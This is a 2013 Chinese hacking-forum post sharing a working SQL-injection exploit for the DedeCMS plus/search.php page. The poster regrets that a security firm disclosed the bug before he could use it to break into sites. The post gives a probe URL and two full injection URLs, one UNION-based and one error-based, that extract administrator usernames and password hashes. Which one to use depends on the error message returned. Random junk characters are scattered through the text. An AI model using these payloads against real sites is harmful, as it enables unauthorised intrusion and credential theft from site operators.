找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2057|回复: 0
打印 上一主题 下一主题

[通杀]dedecms plus/search.php 注入漏洞利用EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-21 08:45:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
转载不加作者名的没JJ3 p2 a" `2 T- u! x& C3 Y: m

1 x: B7 U6 K( T) B. v0 b哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
3 o' ]% k2 s! B* }
; `' K- V3 R, y, M0 ^5 D* K* ^0 s既然已经发出来了,我就把我自己搞的exp发下吧。。唉。2 h' ?# F2 u: b) n- _

9 ~7 x( Q/ U7 T' N8 |6 z) s- Z) ~我一般是这样测试的:& x1 a2 x. {2 G2 X3 i

" j* L0 i! {$ x8 o提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
' p  j; Q# \* E8 {' p
8 B1 n( B. P( w$ ?% ~转载不加作者名的没JJ
, F  R% M: c2 X$ e8 |  g1 v, C9 _- K9 h  J) t% J1 b, V2 i' t
作者:鬼哥- V9 h" i/ J# X' m$ t& h

3 N+ Y0 p6 s( F2 h) h1 B . \  D# [; A/ p* \

6 ?) ~. ]0 r2 H* r看结果如果提示
# o! o7 m- i1 Y1 a4 U0 d( x5 |5 Q
Safe Alert: Request Error step 2 !/ P. D4 n, B. C6 D  R0 L2 Y6 C
' @, z. L) G, d6 d
那么直接用下面的exp; Z. H; K! H" J9 Y

, \( t& g% ?3 [8 `+ I8 M  ]xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
% C1 H# i8 [3 ~- j; I( w& D1 }  F
$ c8 ^! l$ W( G+ ~1 e% x6 X& U  i
0 e; }( M& z2 s2 I  V9 Z5 Y. {% k看结果如果提示
) q; v# h; a. u; Y7 S% O( K: ]" e) Z0 ^  ~$ `* s7 P& v
Safe Alert: Request Error step 1 !
8 Y1 h! ^3 v1 Q6 ], v+ D/ M( W# B0 @8 A
那么直接用下面的exp
7 z3 M! R( L' g/ w: ?8 \' V% I# n- Z$ C
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
0 V6 Z& {& t* v2 x- N6 v
  Q7 O& L8 s1 E$ n3 n0 r/ s
$ F* I* I/ X2 o% P' |) {/ P* a如果正常显示证明漏洞不存在了。: X5 V: P) l6 B7 o8 L. q
! g& A8 z8 j( I# L! e" a
转载不加作者名的没JJ
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表